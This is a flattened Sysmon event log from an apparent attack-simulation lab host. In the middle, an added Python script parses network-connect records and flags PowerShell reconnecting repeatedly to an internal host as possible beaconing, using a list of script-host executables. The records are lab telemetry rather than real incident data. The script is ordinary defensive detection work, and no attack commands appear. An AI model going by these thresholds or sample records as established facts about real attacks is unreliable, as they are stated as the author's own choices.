tdll.dll+51781 10341000x800000000000000036498495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.830{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:07.830{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.830{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A1FF-6140-AC56-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.829{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1FF-6140-AC56-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.812{B81B27B7-A1FF-6140-AC56-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BEAB238D71CE653A11A568D7A6D1A96,SHA256=F7EB02B36FF6D7C9A0BA8DE0C1F46FDAACA76F829D4B43E5D41567DA06EE81BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
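Added example, not part of this log and not Sysmon or Splunk code: a Python script that splits the tag-stripped records on this page back into events, parses the Event ID 3 (NetworkConnect) fields in Sysmon's field order, and groups initiated connections by image, user and destination to surface processes that keep opening fresh sockets to one host. In the records on this page, powershell.exe running as ATTACKRANGE\REED_SCHMIDT connects to 10.0.1.16:443 five times in about nineteen seconds (record IDs 36498485, 36498513, 36498521, 36498528 and 36498535), each from a new ephemeral source port, which is the shape an analyst would want to triage; streamfwd.exe does the same toward 10.0.1.12:8000 and is the forwarder's own traffic that an allowlist would remove. The regexes assume this page's flattened layout (the XML was lost in extraction) rather than Sysmon's real XML; the 60-second window, three-connection minimum and script-host list are my thresholds and not anything the log states. The sample records are copied verbatim from the log above.

```python
"""Split the flattened Sysmon records on this page and flag processes that
keep reconnecting to the same destination (Event ID 3, NetworkConnect)."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Extraction stripped the XML, so each record here is the System header run
# together with the EventData fields.  These regexes target that flattened
# layout, not Sysmon's XML.  Every record has Level 4 and Task == EventID,
# which is what makes the header recoverable from the digit run.
HEADER = re.compile(
    r"(?P<eid>\d+)\d4(?P=eid)0"             # EventID Version Level Task Opcode
    r"0x8000000000000000(?P<rid>\d+)"       # Keywords EventRecordID
    r"Microsoft-Windows-Sysmon/Operational"  # Channel
)
# Event ID 3 EventData in Sysmon field order (IPv4 only, as in this log).
NETCONN = re.compile(
    r"""(?P<utc>\d{4}-\d\d-\d\d\ \d\d:\d\d:\d\d\.\d{3})
        \{(?P<pguid>[0-9A-F-]{36})\}(?P<pid>\d+)
        (?P<image>[A-Za-z]:\\.+?\.exe)(?P<user>.+?\\.+?)
        (?P<proto>tcp|udp)(?P<initiated>true|false)
        (?P<sipv6>true|false)(?P<sip>\d{1,3}(?:\.\d{1,3}){3})
        (?P<shost>.*?)(?P<sport>\d+)(?P<sportname>-|[a-z]+)
        (?P<dipv6>true|false)(?P<dip>\d{1,3}(?:\.\d{1,3}){3})
        (?P<dhost>.*?)(?P<dport>\d+)(?P<dportname>-|[a-z]+)$""",
    re.VERBOSE,
)
# Assumed list of script hosts that rarely need a repeating outbound session.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def split_records(blob):
    """Yield (event_id, record_id, body) for each record in a flattened blob."""
    heads = list(HEADER.finditer(blob))
    for i, h in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(blob)
        yield int(h["eid"]), int(h["rid"]), blob[h.end():end].strip()


def parse_netconn(body):
    """Parse an Event ID 3 body into a dict; None if it does not fit."""
    m = NETCONN.search(body)
    if m is None:
        return None
    c = m.groupdict()
    c["utc"] = datetime.strptime(c["utc"], "%Y-%m-%d %H:%M:%S.%f")
    return c


def repeated_connects(blob, window_s=60.0, min_count=3):
    """Group initiated connections by (image, user, dest) and report groups
    with at least min_count connections inside a window_s second span."""
    groups = defaultdict(list)
    for eid, rid, body in split_records(blob):
        if eid != 3:
            continue
        c = parse_netconn(body)
        if c is None or c["initiated"] != "true":
            continue
        key = (c["image"], c["user"], c["dip"], int(c["dport"]))
        groups[key].append((c["utc"], int(c["sport"]), rid))
    findings = []
    for (image, user, dip, dport), conns in groups.items():
        conns.sort()
        times = [t for t, _, _ in conns]
        span = (times[-1] - times[0]).total_seconds()
        if len(conns) < min_count or span > window_s:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        findings.append({
            "image": image, "user": user, "dest": f"{dip}:{dport}",
            "count": len(conns), "span_s": round(span, 3),
            "mean_gap_s": round(mean(gaps), 3), "gap_stdev_s": round(pstdev(gaps), 3),
            "distinct_src_ports": len({p for _, p, _ in conns}),  # new socket each time
            "record_ids": [r for _, _, r in conns],
            "script_host": image.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS,
        })
    findings.sort(key=lambda f: (not f["script_host"], -f["count"]))
    return findings


# Nine records copied from the log above, space-separated as on the page: five
# powershell.exe connects, three streamfwd.exe connects, one Event ID 23 FileDelete.
SAMPLE_BLOB = " ".join([
    r"354300x800000000000000036498485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:34.023{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50649-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036498488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:35.774{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50650-false10.0.1.12-8000-",
    r"23542300x800000000000000036498490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BEAB238D71CE653A11A568D7A6D1A96,SHA256=F7EB02B36FF6D7C9A0BA8DE0C1F46FDAACA76F829D4B43E5D41567DA06EE81BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space",
    r"354300x800000000000000036498513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:40.038{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50651-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036498516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:41.798{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50652-false10.0.1.12-8000-",
    r"354300x800000000000000036498521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:45.049{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50653-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036498525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:47.807{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50654-false10.0.1.12-8000-",
    r"354300x800000000000000036498528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:49.059{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50655-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036498535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:53.072{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50656-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
])

if __name__ == "__main__":
    for f in repeated_connects(SAMPLE_BLOB):
        name = f["image"].rsplit("\\", 1)[-1]
        tag = "TRIAGE" if f["script_host"] else "baseline?"
        print(f"{tag:9} {name} as {f['user']} -> {f['dest']}: {f['count']} connects "
              f"over {f['span_s']}s, mean gap {f['mean_gap_s']}s, "
              f"{f['distinct_src_ports']} distinct source ports, records {f['record_ids']}")
```

The distinct source port count is the detail worth keeping: five connections on five ports means the process tore the socket down and came back each time rather than holding one HTTPS session, and the regular gap between them is what distinguishes a poller or beacon from a single long download. Whether the result is hostile is not something these records alone settle; both groups here have the same shape, and only knowledge of the environment (streamfwd.exe belongs to the Splunk forwarder and 10.0.1.12 is its indexer) moves one of them to the baseline.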
23542300x800000000000000036498510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.894{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66ADAFFA063B31E5F69D627AC484518C,SHA256=F5D47327D33D42703C5378C4FD68E9677327C9A291C947140690B74AC0CFAC88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.894{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03096B316B445498CDB80B92729F83AE,SHA256=17099BE545FA2BC77C90AD116187120A47A10306CD094B1068345DA0513DE309,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F1D78B2737979FEA8C792A47D93D4B8,SHA256=5FCA120472690D58D0969ED274A89F9E2BB5757E2C3EFAA470F5B277C636EB12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.530{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A200-6140-AD56-04000000C801}5404C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.528{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:08.527{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.527{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:08.527{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.527{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A200-6140-AD56-04000000C801}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.527{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A200-6140-AD56-04000000C801}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.511{B81B27B7-A200-6140-AD56-04000000C801}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:40.038{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50651-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:09.709{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCBE26378484AEF8581ADE400A2FEFC,SHA256=0866E2920706C6BC4E87C286B166F17C5FBA45EEA24CDA2EFF4C277A34F47589,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:09.478{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F49C74FCC3FF113083089EE07652DA2D,SHA256=30A4DEA4BE63DB77E88BEEC02425C66089166DDC50C986D5350678CD6C79DED2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:10.726{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FCF83308872329DCBBD7DD06617AA5B,SHA256=3A5A0D48C0041512F54E94E079D483583C3BB27C56238641D60E1724373E79BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:41.798{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50652-false10.0.1.12-8000- 23542300x800000000000000036498515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:11.729{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E98832193E0FD27D2877B482DC744282,SHA256=6AC7953D42413B89C18E8EA4337AFF076DE0A1085B209F3A357BE8B42B516306,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:12.744{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FD43A3BEB5770E28678AC2251049DFA,SHA256=67858B9F80898D102E9ED21E4312F6CFFAC3F78A434B135CB985492E7B4A188B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:13.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E017D8F8C9DE46C5437480C5E782C60,SHA256=32EC00C326870A3AF80EAC9E4B58AAA09C206FCA4DF18231A775B52D84A06142,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:14.788{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
